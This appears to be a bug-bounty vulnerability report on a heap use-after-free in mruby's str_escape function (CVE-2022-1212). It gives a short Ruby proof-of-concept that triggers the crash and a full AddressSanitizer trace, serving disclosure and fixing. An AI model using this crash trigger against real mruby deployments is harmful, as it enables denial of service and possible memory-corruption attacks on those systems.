Lucene search
Wwkenwong9FCC06D0-08E4-49C8-AFDA-2CAE40946ABEHistoryMar 30, 2022 - 8:19 p.m.
Use-After-Free in str_escape in mruby/mruby
2022-03-3020:19:26
wwkenwong
www.huntr.dev
9
mruby
use-after-free
security vulnerability
EPSS
0.002
Percentile
61.3%
Affected commit:
60cf382ff9765e36b21143d79688a3e758b66fd4
Proof of Concept
v11 = '1111111111111111111111111111'
v17 = {1=>1, 2 => 'b' , '3' => 1}
v20 = []
[1,2,3,4,5,6,7,8,9,10,11,12,13,14].find_all() do [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17].sort_by() do Hash.initialize(){|| [].instance_exec() do end
"".chop() do end
break v11*v0 = 1
} end end
Below is the output from mruby ASAN build:
=================================================================
==19540==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000005a70 at pc 0x55dcacccdfae bp 0x7ffed411d2c0 sp 0x7ffed411d2b0
READ of size 1 at 0x603000005a70 thread T0
#0 0x55dcacccdfad in str_escape /home/fuzz/mruby/src/string.c:1238
#1 0x55dcaccd7b81 in mrb_str_inspect /home/fuzz/mruby/src/string.c:2658
#2 0x55dcacc78b19 in mrb_vm_exec /home/fuzz/mruby/src/vm.c:1640
#3 0x55dcacc6a512 in mrb_vm_run /home/fuzz/mruby/src/vm.c:1131
#4 0x55dcaccb442b in mrb_top_run /home/fuzz/mruby/src/vm.c:3047
#5 0x55dcacd26b2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890
#6 0x55dcacd26e42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933
#7 0x55dcacc35128 in main /home/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
#8 0x7fc0eb414c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#9 0x55dcacc32339 in _start (/home/fuzz/mruby/bin/mruby+0xc2339)
0x603000005a70 is located 0 bytes inside of 29-byte region [0x603000005a70,0x603000005a8d)
freed by thread T0 here:
#0 0x7fc0ebc607a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x55dcacc5fa39 in mrb_default_allocf /home/fuzz/mruby/src/state.c:64
#2 0x55dcacce04bf in mrb_free /home/fuzz/mruby/src/gc.c:288
#3 0x55dcaccc8e67 in mrb_gc_free_str /home/fuzz/mruby/src/string.c:236
#4 0x55dcacce38ff in obj_free /home/fuzz/mruby/src/gc.c:862
#5 0x55dcacce4f2d in incremental_sweep_phase /home/fuzz/mruby/src/gc.c:1142
#6 0x55dcacce556a in incremental_gc /home/fuzz/mruby/src/gc.c:1208
#7 0x55dcacce55ed in incremental_gc_until /home/fuzz/mruby/src/gc.c:1224
#8 0x55dcacce5a64 in mrb_incremental_gc /home/fuzz/mruby/src/gc.c:1275
#9 0x55dcacce1df5 in mrb_obj_alloc /home/fuzz/mruby/src/gc.c:569
#10 0x55dcacc692a6 in break_new /home/fuzz/mruby/src/vm.c:924
#11 0x55dcacc82791 in mrb_vm_exec /home/fuzz/mruby/src/vm.c:2275
#12 0x55dcacc6a512 in mrb_vm_run /home/fuzz/mruby/src/vm.c:1131
#13 0x55dcaccb4219 in mrb_run /home/fuzz/mruby/src/vm.c:3034
#14 0x55dcacc68bc9 in mrb_yield_with_class /home/fuzz/mruby/src/vm.c:879
#15 0x55dcacc4622e in mrb_class_initialize /home/fuzz/mruby/src/class.c:2001
#16 0x55dcacc78b19 in mrb_vm_exec /home/fuzz/mruby/src/vm.c:1640
#17 0x55dcacc6a512 in mrb_vm_run /home/fuzz/mruby/src/vm.c:1131
#18 0x55dcaccb442b in mrb_top_run /home/fuzz/mruby/src/vm.c:3047
#19 0x55dcacd26b2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890
#20 0x55dcacd26e42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933
#21 0x55dcacc35128 in main /home/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
#22 0x7fc0eb414c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
previously allocated by thread T0 here:
#0 0x7fc0ebc60f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x55dcacc5fa53 in mrb_default_allocf /home/fuzz/mruby/src/state.c:68
#2 0x55dcacce01b0 in mrb_realloc_simple /home/fuzz/mruby/src/gc.c:226
#3 0x55dcacce02aa in mrb_realloc /home/fuzz/mruby/src/gc.c:240
#4 0x55dcacce0393 in mrb_malloc /home/fuzz/mruby/src/gc.c:256
#5 0x55dcaccc79c8 in str_init_normal_capa /home/fuzz/mruby/src/string.c:34
#6 0x55dcaccc7b58 in str_init_normal /home/fuzz/mruby/src/string.c:47
#7 0x55dcaccc849c in str_new /home/fuzz/mruby/src/string.c:126
#8 0x55dcacccb9e4 in mrb_str_times /home/fuzz/mruby/src/string.c:896
#9 0x55dcacc78b19 in mrb_vm_exec /home/fuzz/mruby/src/vm.c:1640
#10 0x55dcacc6a512 in mrb_vm_run /home/fuzz/mruby/src/vm.c:1131
#11 0x55dcaccb4219 in mrb_run /home/fuzz/mruby/src/vm.c:3034
#12 0x55dcacc68bc9 in mrb_yield_with_class /home/fuzz/mruby/src/vm.c:879
#13 0x55dcacc4622e in mrb_class_initialize /home/fuzz/mruby/src/class.c:2001
#14 0x55dcacc78b19 in mrb_vm_exec /home/fuzz/mruby/src/vm.c:1640
#15 0x55dcacc6a512 in mrb_vm_run /home/fuzz/mruby/src/vm.c:1131
#16 0x55dcaccb442b in mrb_top_run /home/fuzz/mruby/src/vm.c:3047
#17 0x55dcacd26b2a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6890
#18 0x55dcacd26e42 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6933
#19 0x55dcacc35128 in main /home/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
#20 0x7fc0eb414c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
SUMMARY: AddressSanitizer: heap-use-after-free /home/fuzz/mruby/src/string.c:1238 in str_escape
Shadow bytes around the buggy address:
0x0c067fff8af0: 00 05 fa fa fd fd fd fa fa fa 00 00 00 05 fa fa
0x0c067fff8b00: fd fd fd fa fa fa 00 00 00 05 fa fa fd fd fd fa
0x0c067fff8b10: fa fa 00 00 00 05 fa fa fd fd fd fa fa fa 00 00
0x0c067fff8b20: 00 05 fa fa fd fd fd fa fa fa 00 00 00 05 fa fa
0x0c067fff8b30: fd fd fd fa fa fa 00 00 00 05 fa fa fd fd fd fa
=>0x0c067fff8b40: fa fa 00 00 00 05 fa fa fd fd fd fa fa fa[fd]fd
0x0c067fff8b50: fd fd fa fa fd fd fd fa fa fa 00 00 00 05 fa fa
0x0c067fff8b60: 00 00 00 fa fa fa 00 00 00 05 fa fa 00 00 00 fa
0x0c067fff8b70: fa fa 00 00 00 05 fa fa 00 00 00 fa fa fa 00 00
0x0c067fff8b80: 00 fa fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
0x0c067fff8b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19540==ABORTING
Test Platform:
Ubuntu 18.04
Acknowledgements
This bug was found by Ken Wong(@wwkenwong) and Ming Chan(@mjcpwns) from Black Bauhinia(@blackb6a).
Related
ubuntucve
ubuntucve
CVE-2022-1212
2022-04-05 00:00:00
cve
cve
CVE-2022-1212
2022-04-05 04:15:08
veracode
veracode
Denial Of Service (DoS)
2022-05-12 11:19:35
cvelist
cvelist
CVE-2022-1212 Use-After-Free in str_escape in mruby/mruby in mruby/mruby
2022-04-05 03:45:19
alpinelinux
alpinelinux
CVE-2022-1212
2022-04-05 04:15:00
prion
prion
Design/Logic Flaw
2022-04-05 04:15:00
rubygems
rubygems
Use-After-Free in str_escape in mruby/mruby in mruby/mruby
2022-04-04 21:00:00
nvd
nvd
CVE-2022-1212
2022-04-05 04:15:08
osv
osv
CVE-2022-1212
2022-04-05 04:15:08
libmruby3_0_0-3.0.0-6.1 on GA media
2024-06-15 00:00:00
debiancve
debiancve
CVE-2022-1212
2022-04-05 04:15:08